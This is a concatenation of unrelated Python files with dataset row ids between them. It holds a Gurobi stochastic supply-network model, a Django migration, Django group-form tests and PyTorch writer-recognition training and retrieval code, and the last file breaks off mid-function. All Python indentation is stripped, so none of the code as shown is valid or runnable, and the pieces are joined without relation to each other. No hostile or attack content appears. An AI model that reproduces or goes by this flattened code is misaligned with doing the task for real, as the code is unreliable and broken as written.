# add commodities: for stochastic -add all o-z pairs without setting quantity
for origin_node in network.get_origin_nodes():
for zip_name in network.get_zips():
network.add_commodity(origin_node, zip_name)
# create possible paths for each commodity
for commodity in network.get_commodities():
origin = commodity.origin_node
# O-D paths
for dest in network.get_dest_nodes():
arcs = []
arcs.append(network.get_arc(origin.name + dest.name))
network.add_path(arcs, commodity)
# O-T-D paths
for trans in network.get_trans_nodes():
for dest in network.get_dest_nodes():
arcs = []
arcs.append(network.get_arc(origin.name + trans.name))
arcs.append(network.get_arc(trans.name + dest.name))
network.add_path(arcs, commodity)
return network
def warmstart_model(network, y, u):
# Import solution from mean-value deterministic model
start_trucks = pd.read_csv(datapath + "warm-start-arc-trucks.csv")
dest_assignment = pd.read_csv(datapath + "warm-start-o-z.csv")
# Set y values using trucks dataframe
start_trucks.set_index(["Arc"], inplace=True)
for a in network.get_arcs():
y[a].start = start_trucks.loc[a.origin.name+"->" + a.dest.name, 'Number of Trucks']
# Set u values using dest_assignment dataframe
for index, row in dest_assignment.iterrows():
z = str(row['ZIP'])
d = row['Assigned Destination Node']
u[network.get_zip(z), network.get_node(d)].start = 1
def multi_objective(objectives: list, ext_model):
"""
:param objectives: list of gurobi linear expressions [obj_cost, obj_load, obj_distance]
:param ext_model: gurobi model
:return:
"""
obj_cost, obj_distance, obj_load = objectives[0], objectives[1], objectives[2]
ext_model.setParam("TimeLimit", 300)
ext_model.setParam("MIPGap", 0.04)
solution_values = {}
epsilon_values = np.arange(start=0, stop=0.2, step=0.05)
tolerance = 0.000001
# Solve for cost without any additional constraint
ext_model.setObjective(obj_cost)
ext_model.optimize()
# solution_values['cost'][0] = ext_model.getObjective().getValue()
best_cost = ext_model.getObjective().getValue()
# Get corresponding best (most equitable) load just so we have a reference
# ext_model.addConstr(obj_cost <= best_cost + tolerance)
# ext_model.setObjective(obj_load)
# ext_model.optimize()
# best_load_1 = ext_model.getObjective().getValue()
# Generating Pareto solution "blanket" for cost as first objective
for i in epsilon_values:
solution_values[i] = {}
# Optimize for distance allowing for some deterioration in cost
ext_model.setObjective(obj_distance)
cost_rhs = (1 + i) * best_cost + tolerance
ext_model.addConstr(obj_cost <= cost_rhs)
ext_model.optimize()
best_dist = ext_model.getObjective().getValue()
# Store distance obj. value for corresponding epsilon
solution_values[i]['distance'] = best_dist
# Get best corresponding cost (might be slightly different)
ext_model.addConstr(obj_distance <= best_dist + tolerance)
ext_model.setObjective(obj_cost)
ext_model.optimize()
best_cost = ext_model.getObjective().getValue()
# Store cost obj. value for corresponding epsilon
solution_values[i]['cost'] = best_cost
# Optimize for load without allowing deterioration
cost_rhs = best_cost + tolerance
ext_model.addConstr(obj_cost <= cost_rhs)
ext_model.setObjective(obj_load)
ext_model.optimize()
# Store load obj. value for corresponding epsilon
solution_values[i]['load'] = ext_model.getObjective().getValue()
print(solution_values)
# for j in epsilon_values:
#
# ext_model.setObjective(obj_load)
# dist_rhs = (1 + epsilon_values[i]) * best_dist + tolerance
# ext_model.addConstr(obj_distance <= dist_rhs)
# ext_model.optimize()
# best_load = ext_model.getObjective().getValue()
# solution_values['load'][index_i] = best_dist
# fix epsilon for load
# epsilon_values['load'] = 5000 # we can directly change it depending on how much difference we want to allow maybe?
# ext_model.addConstr(obj_load<=epsilon_values['load'])
# write solution to csvs
# write_arcs_to_csv(y,network,"TruckAssignments.csv")
# write_zd_to_csv(u,network,"CustomerAssignments.csv")
def create_extensive_form_model(network: Network, scenarios: list, demand_data):
"""
demand_data: dict
:param scenarios: [1,2,....N]
:param demand_data: dict with tuple keys of the form (scenario_num, commodity_name)
:param network: Network object: consists of all commodities across all the scenarios
:return:
"""
# create path variables for each commodity
m = Model("extensive")
# Decision variables-first stage begin
y = m.addVars(network.get_arcs(), vtype=GRB.INTEGER, lb=0, name='NumTrucks')
u = m.addVars(network.get_zips(), network.get_dest_nodes(), vtype=GRB.BINARY, lb=0, name='ZipDestinationMatch')
tuplelist_comm_path_scenario = [(k, p, s) for k in network.get_commodities()
for p in network.get_commodity_paths(k) for s in scenarios]
# Decision variables-first stage end
# Decision variables-second stage begin
x = m.addVars(tuplelist_comm_path_scenario, vtype=GRB.CONTINUOUS, lb=0, ub=1,
name='CommodityPathScenario')
unfulfilled = m.addVars(network.get_commodities(), scenarios, vtype=GRB.CONTINUOUS,
lb=0, ub=1, name='FractionUnfulfilledScenario')
r = m.addVars(network.get_commodities(), scenarios, vtype=GRB.CONTINUOUS, lb=0, name='DistanceTraveledByCommodity')
max_load = m.addVars(scenarios, vtype=GRB.CONTINUOUS, lb=0, name='MaxLoad')
min_load = m.addVars(scenarios, vtype=GRB.CONTINUOUS, lb=0, name='MinLoad')
# Decision variables-second stage end
m.update()
m.modelSense = GRB.MINIMIZE
#
# first stage constraints--begin
m.addConstrs(
(u.sum(z, '*') == 1 for z in network.get_zips()), name='DestNodeSelection')
# first stage constraints--end
# second stage constraints--begin
m.addConstrs(
(r[k, s] >= p.distance * x[k, p, s] +
dist(k.dest.lat, d.lat, k.dest.lon, d.lon) * u[k.dest, d]
for k in network.get_commodities() for d in network.get_dest_nodes()
for p in network.get_commodity_dest_node_paths(k, d) for s in scenarios),
name='DistanceDestinationNodeToZip')
m.addConstrs(
(x.sum(k, '*', s) + unfulfilled[(k, s)] == 1 for k in network.get_commodities()
for s in scenarios), name='CommodityFulfillment')
m.addConstrs(
(x[k, p, s] <= y[a] for s in scenarios for k in network.get_commodities()
for p in network.get_commodity_paths(k) for a in p.arcs), name='PathOpen')
# next constraint needs to be updated in each batch run: update just coefficients
m.addConstrs((quicksum(demand_data[(s, p.commodity)] * x[p.commodity, p, s]
for p in network.get_arc_paths(a)) <= 1000 * y[a] for a in network.get_arcs() for s in
scenarios), name='ArcCapacity')
# m.addConstrs(
# (u[k.dest, d] >= sum(x[k, p, s] for p in network.get_commodity_dest_node_paths(k, d))
# for k in network.get_commodities() for d in network.get_dest_nodes() for s in scenarios
# ), name='PathOpenZipDestination')
# m.addConstrs(
# (u[k.dest, d] >= x[k, p, s]for k in network.get_commodities() for d in network.get_dest_nodes()
# for p in network.get_commodity_dest_node_paths(k, d) for s in scenarios
# ), name='PathOpenZipDestination')
m.addConstrs(u[z, d] >= x[p.commodity, p, s] for z in network.get_zips() for d in network.get_dest_nodes()
for p in network.get_dest_node_zip_paths(d, z) for s in scenarios)
# next two constraint needs to be updated in each batch run: update just coefficients
m.addConstrs((min_load[s] <= sum(u[k.dest, d] * demand_data[s, k] for k in network.get_commodities())
for d in network.get_dest_nodes() for s in scenarios), name="MinLoad")
m.addConstrs((max_load[s] >= sum(u[k.dest, d] * demand_data[s, k] for k in network.get_commodities())
for d in network.get_dest_nodes() for s in scenarios), name="MaxLoad")
# second stage constraints--end
obj_cost = LinExpr(quicksum((100 + 2 * a.distance) * y[a] for a in network.get_arcs())) + (
1 / len(scenarios)) * quicksum(
1000 * demand_data[s, k] * unfulfilled[k, s] for k in network.get_commodities() for s in
scenarios)
obj_load = (1 / len(scenarios)) * quicksum(max_load[s] - min_load[s] for s in scenarios)
obj_distance = quicksum((1 / len(scenarios)*r[k, s] for k in network.get_commodities() for s in scenarios))
use_cost = False # 11322, 12939
use_load = False # 100, 2000
use_distance = False # 570,690
# if use_cost:
# m.setObjective(obj_cost)
# m.addConstr(obj_load<=2500)
# m.addConstr(obj_distance<=700)
# elif use_load:
# m.setObjective(obj_load)
# m.addConstr(obj_cost<=2*11322)
# m.addConstr(obj_distance<=690)
# elif use_distance:
# m.setObjective(obj_distance)
# m.addConstr(obj_cost<=1.2*12939) #2*11322
# m.addConstr(obj_load<=2000)
# else:
# print("No objective specified")
# m.setObjective(quicksum((100 + 2 * a.distance) * y[a] for a in network.get_arcs()) +
# (1 / len(scenarios)) * quicksum(
# 1000 * demand_data[s, k] * unfulfilled[k, s] for k in network.get_commodities() for s in
# scenarios)
# + (1 / len(scenarios)) * quicksum(max_load[s] - min_load[s] for s in scenarios) +
# quicksum(r[z] for z in network.get_zips())
# )
# m.setParam("TimeLimit", 400)
# m.setParam("MIPGap", 0.04)
# adding some heuristics constraint
# a zip should be connected to one of the closes 3 dest nodes
# for z in network.get_zips():
# close_dest_nodes = network.get_closest_dest_nodes(z,4)
# for d in network.get_dest_nodes():
# if d not in close_dest_nodes:
# m.addConstr(u[z,d]==0)
m.update()
# Warmstart model
warmstart_model(network, y, u)
"""
a=network.get_arcs()[0]
s=1
p=network.get_arc_paths(a)[0]
m.chgCoeff(m.getConstrByName("ArcCapacity[{},{}]".format(a,s)), x[p.commodity, p, s], 60)
Don't query again and again: query oonce and store the variables
Modifying objective
m.getVarByName("FractionUnfulfilledScenario[{},{}]".format(k,s)).setAttr("obj",1000*demand_data[s,k)
"""
return [obj_cost, obj_load, obj_distance], m
def run_saa(network, batch_num, scen_num):
scenario_list = [i for i in range(scen_num)]
# declare dictionaries for storing necessary objects to update model
unfulfilled_vars = {}
x_vars = {}
u_vars = {}
y_vars={}
arc_capacity_constraints = {}
min_load_con = {}
max_load_con = {}
for i in range(batch_num):
# generate demand data
demand_data = {}
for k in network.get_commodities():
for s in scenario_list:
temp_demand = max(int(demand_generator(k.origin_node.name, int(k.dest.name))), 0)
demand_data[(s, k)] = temp_demand
# build or update model
if i == 0:
# build model from scratch
objectives, ext_model = create_extensive_form_model(network, scenario_list, demand_data)
# get necessary variables and constraints which need to be updated
for s in scenario_list:
for k in network.get_commodities():
unfulfilled_vars[(k, s)] = ext_model.getVarByName("FractionUnfulfilledScenario[{},{}]".format(k, s))
for a in network.get_arcs():
arc_capacity_constraints[(a, s)] = ext_model.getConstrByName("ArcCapacity[{},{}]".format(a, s))
for k in network.get_commodities():
for p in network.get_commodity_paths(k):
x_vars[(k, p, s)] = ext_model.getVarByName("CommodityPathScenario[{},{},{}]".format(k, p, s))
for d in network.get_dest_nodes():
min_load_con[d, s] = ext_model.getConstrByName("MinLoad[{},{}]".format(d, s))
max_load_con[d, s] = ext_model.getConstrByName("MaxLoad[{},{}]".format(d, s))
for zip_name in network.get_zips():
for destination_node in network.get_dest_nodes():
u_vars[(zip_name, destination_node)] = ext_model.getVarByName("ZipDestinationMatch[{},{}]".format(
zip_name, destination_node))
for arc in network.get_arcs():
y_vars[arc] = ext_model.getVarByName("NumTrucks[{}]".format(arc))
# use multi objective stuff
multi_objective(objectives, ext_model)
else:
# change coefficients of model with the new demand data
# update arc capacity constraint
for a in network.get_arcs():
for p in network.get_arc_paths(a):
for s in scenario_list:
ext_model.chgCoeff(arc_capacity_constraints[a, s], x_vars[p.commodity, p, s],
demand_data[s, p.commodity])
# update load constraints
for s in scenario_list:
for d in network.get_dest_nodes():
for k in network.get_commodities():
ext_model.chgCoeff(min_load_con[d, s], u_vars[k.dest, d], -demand_data[s, k]) # coeff are neg
ext_model.chgCoeff(max_load_con[d, s], u_vars[k.dest, d], -demand_data[s, k])
# update objective
for k in network.get_commodities():
for s in scenario_list:
unfulfilled_vars[k, s].setAttr("obj", 1000 * demand_data[s, k]) # Change in linear expression
ext_model.update()
network = create_stochastic_network()
run_saa(network, 1, 1)
|
996,670 | 3cc6fd8efb4774186682e7cc75418d595b7d696f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('jobpost', '0002_auto_20150825_0115'),
]
operations = [
migrations.CreateModel(
name='Roles',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('roles', models.CharField(max_length=3, choices=[(b'RO', b'Rogue'), (b'WA', b'Warrior'), (b'WI', b'Wizard'), (b'AR', b'Archer')])),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
]
|
996,671 | 3469776d21a1e64aec486755074d6426f76f4102 | leafGIF="""""" |
996,672 | fcf74e0f7b8ad56e01c934dfcefef7ca618ee41a | """Tests for group forms."""
# pylint: disable=invalid-name
from datetime import datetime
from unittest import TestCase
from taggit.models import Tag
from mock import patch, call
from model_mommy import mommy
from open_connect.connectmessages.tests import ConnectMessageTestCase
from open_connect.groups import forms
from open_connect.groups.models import Group, GroupRequest
from open_connect.connect_core.tests.test_utils_mixins import TEST_HTML
class GroupRequestFormTest(ConnectMessageTestCase):
"""Tests for GroupRequestForm."""
@patch('open_connect.groups.tasks.send_system_message')
def test_save_approve(self, mock):
"""Test that save does the right thing if approving."""
group = mommy.make('groups.Group', group__name='Cool Group')
group_request = GroupRequest.objects.create(
user=self.user2, group=group)
form = forms.GroupRequestForm({
'open_requests': [group_request.pk],
'action': 'approve'
})
self.assertTrue(form.is_valid())
form.save(user=self.user1)
group_request = GroupRequest.objects.get(pk=group_request.pk)
self.assertEqual(group_request.moderated_by, self.user1)
self.assertIsInstance(group_request.moderated_at, datetime)
self.assertTrue(group_request.approved)
self.assertIn(group.group, self.user2.groups.all())
self.assertTrue(mock.delay.called)
message_args = mock.delay.call_args[0]
self.assertEqual(message_args[0], self.user2.pk)
self.assertEqual(message_args[1], u"You've been added to Cool Group")
self.assertIn(group.full_url, message_args[2])
def test_save_reject(self):
"""Test that save does the right thing if rejecting."""
group_request = GroupRequest.objects.create(
user=self.user2, group=self.group)
form = forms.GroupRequestForm({
'open_requests': [group_request.pk],
'action': 'reject'
})
self.assertTrue(form.is_valid())
form.save(user=self.user1)
group_request = GroupRequest.objects.get(pk=group_request.pk)
self.assertEqual(group_request.moderated_by, self.user1)
self.assertIsInstance(group_request.moderated_at, datetime)
self.assertFalse(group_request.approved)
self.assertNotIn(self.group.group, self.user2.groups.all())
class GroupFormTest(ConnectMessageTestCase):
""""Tests for GroupForm."""
def setUp(self):
"""Setup the GroupFormTest"""
self.category = mommy.make('groups.Category')
def test_clean_tags_with_valid_tags(self):
"""Form should validate if submitted with valid tags."""
Tag.objects.create(name='these')
Tag.objects.create(name='are')
Tag.objects.create(name='valid')
Tag.objects.create(name='tags')
form = forms.GroupForm(
{
'tags': 'these,are, valid, tags',
'category': self.category.pk
})
self.assertTrue(form.is_valid())
def test_clean_tags_with_invalid_tags(self):
"""Form should have errors if submitted with invalid tags."""
form = forms.GroupForm(
{
'tags': 'this,is,an,invalid,tag,list',
'category': self.category.pk
})
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors['tags'],
[u'These tags are invalid: an, invalid, is, list, tag, this.']
)
@patch('open_connect.groups.forms.add_user_to_group')
def test_owners_added_to_group(self, mock):
"""Test that owners are added to the group"""
form = forms.GroupForm(
{
'owners': [self.user1.pk, self.user2.pk],
'category': self.category.pk
},
instance=self.group1
)
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(mock.delay.call_count, 2)
call_list = mock.delay.call_args_list
self.assertItemsEqual(
call_list,
[call(self.user1.pk, self.group1.pk),
call(self.user2.pk, self.group1.pk)]
)
@patch.object(forms.SanitizeHTMLMixin, 'sanitize_html')
def test_clean_description(self, mock):
"""Test the clean_description cleaner"""
# pylint: disable=no-self-use
group = mommy.make(Group)
form = forms.GroupForm(
{
'description': TEST_HTML,
'category': self.category.pk
},
instance=group
)
form.is_valid()
mock.assertCalledWith(TEST_HTML)
class GroupInviteFormTest(TestCase):
"""Tests for GroupInviteForm"""
def test_invalid_emails_cause_error(self):
"""Test that passing in an invalid email causes an error"""
form = forms.GroupInviteForm({'emails': 'abcd123123'})
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors['emails'],
[u'No Valid Addresses Found'])
def test_valid_address_go_through(self):
"""Test that passing in a valid email address works"""
form = forms.GroupInviteForm({'emails': 'me@razzmatazz.local'})
self.assertTrue(form.is_valid())
def test_multiple_addresses(self):
"""Test that multiple addresses go through"""
# pylint: disable=line-too-long
emails = 'me@razzmatazz.local, m@razzmatazz.local, Adam <adam@gmail.com>'
form = forms.GroupInviteForm({'emails': emails})
self.assertTrue(form.is_valid())
class GroupDeleteFormTest(TestCase):
"""Tests for GroupDeleteForm."""
def test_yes(self):
"""Group should be deleted if the answer is yes."""
group = Group.objects.create(name='yes')
form = forms.GroupDeleteForm({'are_you_sure': 'yes'})
form.group = group
self.assertTrue(form.is_valid())
form.save()
group = Group.objects.with_deleted().get(pk=group.pk)
self.assertEqual(group.status, 'deleted')
def test_no(self):
"""Group should not be deleted if the answer is no."""
group = Group.objects.create(name='no')
form = forms.GroupDeleteForm({'are_you_sure': 'no'})
form.group = group
self.assertTrue(form.is_valid())
form.save()
group = Group.objects.get(pk=group.pk)
self.assertEqual(group.status, 'active')
|
996,673 | d8517c7e95e2211d3dd4eba22f5a477f177fdab0 | import glob
import os
import random
import time
import numpy as np
from PIL import Image
import scipy.spatial.distance
from sklearn import preprocessing
import torch
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from tqdm.notebook import tqdm
"""
Utility methods and classes for PyTorch training and inference for writer recognition tasks.
"""
def set_all_seeds(seed):
"""
Ensures reproducible behaviour by resetting all seeds with the seed given by `seed`.
Moreover, additional parameters are set to ensure deterministic behaviour.
Reference:
[1] https://pytorch.org/docs/stable/notes/randomness.html, Accessed: 2021-07-19
Args:
seed: The desired seed to be set
"""
os.environ['PYTHONHASHSEED'] = str(seed)
random.seed(seed)
torch.manual_seed(seed)
np.random.seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def seed_worker(worker_id):
"""
Ensures reproducibility for `DataLoader` classes.
This method is meant to be handed as an argument to the parameter `worker_init_fn` of a
PyTorch `DataLoader`.
Reference:
[1] https://pytorch.org/docs/stable/notes/randomness.html#dataloader, Accessed: 2021-07-19
Args:
worker_id : Argument is handled by the respective `DataLoader`
"""
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
class Trainer:
"""Class for training a model.
This class supports also logging with `TensorBoard`"""
def __init__(self, model, criterion, optimizer, scheduler, num_epochs, train_set_loader, val_set_loader,
experiment_name=None, hyper_params=None, num_epochs_early_stop=10, log_dir=None,
saved_models_dir=None):
"""
Args:
model: Model to be trained
criterion: Desired criterion
optimizer: Desired optimizer
scheduler: Learning rate scheduler. Set this argument to `None`,
if you do not want to use an LR scheduler
num_epochs: Maximum number of epochs the model should be trained for
train_set_loader: `DataLoader` instance of the training set
val_set_loader: `DataLoader` instance of the validation set
experiment_name (optional): Name of the experiment (has to be a valid name for
a directory). If set to `None`, the experiment will be named 'experiment_<unix time stamp>'
hyper_params (optional): Dictionary containing the hyper parameters of the trained model to be
logged to `TensorBoard`
num_epochs_early_stop (optional): Number of epochs after the training should be stopped,
if the validation loss does not improve any more
log_dir (optional): Path to the root directory, where the `TensorBoard` data should be logged to.
If set to `None`, no logging takes place.
saved_models_dir (optional): Path to the root directory, where the models should be saved to.
A model is saved after each epoch, where the validation loss improved compared to the best so far
obtained validation loss. If set to `None`, no models are saved.
"""
self.model = model
self.criterion = criterion
self.optimizer = optimizer
self.scheduler = scheduler
self.num_epochs = num_epochs
self.train_set_loader = train_set_loader
self.val_set_loader = val_set_loader
self.hyper_params = hyper_params
self.num_epochs_early_stop = num_epochs_early_stop
if experiment_name:
self.experiment_name = experiment_name
else:
self.experiment_name = "experiment_" + str(int(time.time() * 1000.0))
self.log_path = None
self.summary_writer = None
if log_dir:
self.log_path = os.path.join(log_dir, self.experiment_name)
# ensures, that no previous experiment with the same name was already conducted in `log_dir`
os.makedirs(self.log_path)
self.summary_writer = SummaryWriter(self.log_path)
self.saved_models_path = None
if saved_models_dir:
self.saved_models_path = os.path.join(saved_models_dir, self.experiment_name)
os.makedirs(self.saved_models_path)
self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
def __call__(self, *args, **kwargs):
"""Starts the training"""
epoch_train_acc, epoch_val_acc, epoch_train_loss, epoch_val_loss = 0., 0., 0., 0.
best_train_acc, best_val_acc, best_train_loss, best_val_loss = 0., 0., float('inf'), float('inf')
early_stop_count = 0
early_stop = False
epoch = 0
for epoch in range(self.num_epochs):
print(f"Epoch {epoch + 1}/{self.num_epochs}")
if self.train_set_loader:
epoch_train_acc, epoch_train_loss = self._train(epoch)
if self.val_set_loader:
epoch_val_acc, epoch_val_loss = self._validate()
# logging
if self.summary_writer:
self.summary_writer.add_scalars("accuracy", {
"training": epoch_train_acc,
"validation": epoch_val_acc,
}, epoch + 1)
self.summary_writer.add_scalars("loss", {
"training": epoch_train_loss,
"validation": epoch_val_loss,
}, epoch + 1)
self.summary_writer.flush()
if epoch_val_loss < best_val_loss:
early_stop_count = 0
if self.saved_models_path:
torch.save(self.model.state_dict(),
os.path.join(self.saved_models_path, f"epoch_{epoch + 1}.pth"))
else:
early_stop_count += 1
best_train_acc = (epoch_train_acc if epoch_train_acc > best_train_acc else best_train_acc)
best_val_acc = (epoch_val_acc if epoch_val_acc > best_val_acc else best_val_acc)
best_train_loss = (epoch_train_loss if epoch_train_loss < best_train_loss else best_train_loss)
best_val_loss = (epoch_val_loss if epoch_val_loss < best_val_loss else best_val_loss)
if early_stop_count == self.num_epochs_early_stop:
print(f"Early stopping at epoch {epoch + 1} triggered.")
early_stop = True
break
if self.summary_writer:
if self.hyper_params:
self.summary_writer.add_hparams(
self.hyper_params,
{
"hparams/acc_train": best_train_acc,
"hparams/acc_val": best_val_acc,
"hparams/loss_train": best_train_loss,
"hparams/loss_val": best_val_loss,
"hparams/num_epochs": epoch + 1 if not early_stop else epoch + 1 - self.num_epochs_early_stop
}
)
self.summary_writer.close()
def _train(self, epoch):
running_train_acc = 0
running_train_loss = 0
self.model.train()
for data, label in tqdm(self.train_set_loader):
data = data.to(device=self.device)
label = label.to(device=self.device)
output = self.model(data)
loss = self.criterion(output, label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
running_train_acc += (output.argmax(dim=1) == label).float().mean()
running_train_loss += loss.item()
if self.scheduler:
self.scheduler.step()
epoch_train_acc = running_train_acc / len(self.train_set_loader)
epoch_train_loss = running_train_loss / len(self.train_set_loader)
return epoch_train_acc, epoch_train_loss
@torch.no_grad()
def _validate(self):
running_val_acc = 0
running_val_loss = 0
self.model.eval()
for data, label in self.val_set_loader:
data = data.to(device=self.device)
label = label.to(device=self.device)
output = self.model(data)
loss = self.criterion(output, label)
running_val_acc += (output.argmax(dim=1) == label).float().mean()
running_val_loss += loss.item()
epoch_val_acc = running_val_acc / len(self.val_set_loader)
epoch_val_loss = running_val_loss / len(self.val_set_loader)
return epoch_val_acc, epoch_val_loss
class ClassificationTester:
"""Class for testing a dataset as a classification task"""
def __init__(self, test_set_path, model):
"""
Args:
test_set_path: Path to the preprocessed dataset to be tested
model: Model to be used already set into evaluation mode and with
loaded parameters (trained weights)
"""
self.page_paths = glob.glob(os.path.join(test_set_path, "*/*"))
self.model = model
# get the same class to index mapping as in the training set based on `ImageFolder`
self.class_to_idx = datasets.ImageFolder(os.path.join(test_set_path, os.pardir, "train")).class_to_idx
self.num_classes = len(self.class_to_idx)
@torch.no_grad()
def __call__(self, device, batch_size, num_workers, top_k=None, *args, **kwargs):
"""Starts the classification-based evaluation
Args:
device: Device to be used (e.g. 'cuda')
batch_size: Desired batch size (recommended: 1)
num_workers: Number of PyTorch workers
top_k (list, optional): Top k to be evaluated; each k should be given
as a single entry in the list
Returns:
the evaluation result as a dictionary
"""
if top_k is None:
top_k = [1, 2, 3, 4, 5]
top_k_correct = {k: 0 for k in top_k}
seed = 417
set_all_seeds(seed)
for idx, page_path in enumerate(self.page_paths, 1):
print(f"Testing page {idx}/{len(self.page_paths)}")
page_class = page_path.split(os.sep)[-2]
page_label = torch.tensor(self.class_to_idx[page_class])
page = WriterItem(page_path, page_label, "jpg", transform=transforms.ToTensor())
test_set_loader = DataLoader(dataset=page, shuffle=False, batch_size=batch_size, num_workers=num_workers,
worker_init_fn=seed_worker, generator=torch.Generator().manual_seed(seed))
output_avg = torch.zeros(self.num_classes).to(device=device)
for data, _ in test_set_loader: # label can be ignored, since one page has exactly one writer
data = data.to(device=device)
output = self.model(data)
output_avg += output.mean(dim=0)
output_avg /= len(test_set_loader)
top_k = torch.topk(output_avg, max(top_k), dim=0).indices
for k in top_k_correct.keys():
top_k_correct[k] += torch.any(top_k[:k] == page_label).float().item()
for k in top_k_correct.keys():
top_k_correct[k] /= len(self.page_paths)
return top_k_correct
class RetrievalTester:
"""Class for testing a dataset as a retrieval task
Given a page of a writer divided into several image patches, the output of
the transformer encoder and the MLP head of the network are used to form a global feature vector
for the entire page by averaging them (similar to [1]).
Besides the soft and hard criterion, also the mAP (mean average precision) is calculated.
Reference:
[1] S. Fiel and R. Sablatnig, ‘Writer Identification and Retrieval Using
a Convolutional Neural Network’, in Computer Analysis of Images and Patterns,
vol. 9257, G. Azzopardi and N. Petkov, Eds. Cham: Springer International Publishing, 2015, pp. 26–37.
doi: 10.1007/978-3-319-23117-4_3.
"""
def __init__(self, feature_vector_dims, test_set_path, model):
"""
Args:
feature_vector_dims (tuple): Dimension of the output of the transformer encoder and
the MLP head of the network given as tuple (dim transformer encoder, dim mlp head)
test_set_path: Path to the preprocessed dataset to be tested
model: Model to be used already set into evaluation mode and with
loaded parameters (trained weights)
"""
self.page_paths = glob.glob(os.path.join(test_set_path, "*/*"))
self.feature_vector_dims = feature_vector_dims
self.model = model
self.calculated_feature_vectors = False
self.labels = None
self.global_feature_vectors_transformer_encoder = None
self.global_feature_vectors_mlp_head = None
self.num_rel_docs_per_label = None
@torch.no_grad()
def __call__(self, device, batch_size, num_workers, soft_top_k=None, hard_top_k=None,
metrics=None, *args, **kwargs):
"""Starts the retrieval-based evaluation
Args:
device: Device to be used (e.g. 'cuda')
batch_size: Desired batch size (recommended: 1)
num_workers: Number of PyTorch workers
soft_top_k (list, optional): Top k to be evaluated with the soft criterion;
each k should be given as a single entry in the list
hard_top_k (list, optional): Top k to be evaluated with the hard criterion;
each k should be given as a single entry in the list
metrics (list, optional): Distance metrics to be used for evaluation.
Supported values see [1].
Returns:
the evaluation result as a dictionary
Reference:
[1] https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.pdist.html,
Accessed: 2021-09-16
"""
if soft_top_k is None:
soft_top_k = [1, 2, 3, 4, 5]
if hard_top_k is None:
hard_top_k = [1]
if metrics is None:
metrics = ["cosine"]
if not self.calculated_feature_vectors:
self.labels, self.global_feature_vectors_transformer_encoder, self.global_feature_vectors_mlp_head = \
self._calculate_feature_vectors(device, batch_size, num_workers)
_, inv_idx, num_rel_docs_inv = self.labels.unique(return_inverse=True, return_counts=True)
self.num_rel_docs_per_label = (num_rel_docs_inv[inv_idx] - 1)
self.calculated_feature_vectors = True
assert self.labels is not None and self.global_feature_vectors_transformer_encoder is not None and \
self.global_feature_vectors_mlp_head is not None and self.num_rel_docs_per_label is not None, \
"Feature vectors were not calculated"
assert torch.any(
self.num_rel_docs_per_label > 0), "Cannot perform retrieval-based evaluation: There is a writer with " \
"only one document in the test set"
return {"transformer_encoder": self._evaluate(self.global_feature_vectors_transformer_encoder, self.labels,
self.num_rel_docs_per_label, soft_top_k, hard_top_k, metrics),
"mlp_head": self._evaluate(self.global_feature_vectors_mlp_head, self.labels,
self.num_rel_docs_per_label,
soft_top_k, hard_top_k, metrics)}
@torch.no_grad()
def _calculate_feature_vectors(self, device, batch_size, num_workers):
seed = 417
set_all_seeds(seed)
results_intermediate_layers = {}
hook_transformer_encoder = self.model.to_latent.register_forward_hook(
self._get_intermediate_layer(results_intermediate_layers, "to_latent"))
global_feature_vectors_transformer_encoder = torch.zeros((len(self.page_paths), self.feature_vector_dims[0])).to(
device=device)
global_feature_vectors_mlp_head = torch.zeros((len(self.page_paths), self.feature_vector_dims[1])).to(
device=device)
labels = torch.zeros((len(self.page_paths),), dtype=torch.int)
for idx, page_path in enumerate(self.page_paths, 0):
print(f"Calculating feature vector for page {idx + 1}/{len(self.page_paths)}")
page_label = page_path.split(os.sep)[-2]
page = WriterItem(page_path, page_label, "jpg", transform=transforms.ToTensor())
test_set_loader = DataLoader(dataset=page, shuffle=False, batch_size=batch_size, num_workers=num_workers,
worker_init_fn=seed_worker, generator=torch.Generator().manual_seed(seed))
for num_batches, (data, label) in enumerate(test_set_loader, 1):
data = data.to(device=device)
output = self.model(data)
global_feature_vectors_transformer_encoder[idx] += results_intermediate_layers["to_latent"].mean(dim=0)
global_feature_vectors_mlp_head[idx] += output.mean(dim=0)
global_feature_vectors_transformer_encoder[idx] /= num_batches
global_feature_vectors_mlp_head[idx] /= num_batches
labels[idx] = float(label[0])
hook_transformer_encoder.remove()
return labels, global_feature_vectors_transformer_encoder, global_feature_vectors_mlp_head
@staticmethod
def _get_intermediate_layer(activations, key):
def hook(model, input, output):
activations[key] = output
return hook
@staticmethod
def _evaluate(global_feature_vectors, labels, num_rel_docs_per_label, soft_top_k, hard_top_k, metrics):
global_feature_vectors_norm = preprocessing.normalize(global_feature_vectors.detach().cpu().numpy())
result = {}
for m in metrics:
result[m] = {}
# dist_matrix rows (dim 0): distance to other documents
# dist_matrix columns (dim 1): query documents
# the distance on the diagonal is set to infinity, since the distance of a query document
# to itself should not be considered
dist_matrix = torch.from_numpy(scipy.spatial.distance.squareform(
scipy.spatial.distance.pdist(global_feature_vectors_norm, metric=m))).float().fill_diagonal_(
float("Inf"))
num_docs = dist_matrix.shape[0]
ranking = torch.topk(dist_matrix, num_docs, dim=0, largest=False).indices
soft_top_k_result = {}
for k in soft_top_k:
soft_top_k_result[k] = (labels[ranking[:k]] == labels).any(dim=0).float().mean().item()
hard_top_k_result = {}
for k in hard_top_k:
hard_top_k_result[k] = (labels[ranking[:k]] == labels).all(dim=0).float().mean().item()
result[m]["soft_top_k"] = soft_top_k_result
result[m]["hard_top_k"] = hard_top_k_result
# mAP
